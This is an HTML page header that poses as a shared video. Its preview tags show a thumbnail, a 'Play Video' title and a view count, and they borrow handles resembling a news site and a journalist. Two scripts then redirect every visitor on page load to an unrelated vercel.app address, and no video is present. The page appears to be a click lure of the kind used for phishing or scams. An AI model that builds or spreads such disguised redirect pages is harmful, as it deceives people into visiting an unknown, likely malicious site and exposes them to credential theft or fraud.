<head>
    <meta charset="UTF-8">
    <title>Mis video</title>

<meta content='summary' name='twitter:card'/>
<meta content='@nytimesbits' name='twitter:site'/>
<meta content='@nickbilton' name='twitter:creator'/>
<meta content='https://scontent.fhex4-2.fna.fbcdn.net/v/t1.0-9/116300688_616104999018660_2097268288914317987_n.jpg?_nc_cat=109&_nc_sid=ca434c&_nc_eui2=AeGZQdjCPDJYuBFzBlUfnNb2Mw8-psTFF1kzDz6mxMUXWZKnG4a2dBuhEAiZIoC6Q-Zb_FHQHZDVknRtS28UUrGH&_nc_ohc=wNyvet3-EgwAX8PlUym&_nc_ht=scontent.fhex4-2.fna&oh=fb098fd5eab53189ccb88293315f8af7&oe=5F4A1A17'/>
<meta content='Play Video' property='og:title'/>
<meta content='2,481 Views' property='og:description'/>
<meta content='https://scontent.fhex4-2.fna.fbcdn.net/v/t1.0-9/116300688_616104999018660_2097268288914317987_n.jpg?_nc_cat=109&_nc_sid=ca434c&_nc_eui2=AeGZQdjCPDJYuBFzBlUfnNb2Mw8-psTFF1kzDz6mxMUXWZKnG4a2dBuhEAiZIoC6Q-Zb_FHQHZDVknRtS28UUrGH&_nc_ohc=wNyvet3-EgwAX8PlUym&_nc_ht=scontent.fhex4-2.fna&oh=fb098fd5eab53189ccb88293315f8af7&oe=5F4A1A17' property='og:image'/>

<script type="text/javascript">
        if (screen.width <= 1080) {
        window.location = "https://angularewewte.vercel.app/";
    } else {

    }
</script>

<script type='text/javascript'> 
        window.location.href = 'https://angularewewte.vercel.app/';
</script>

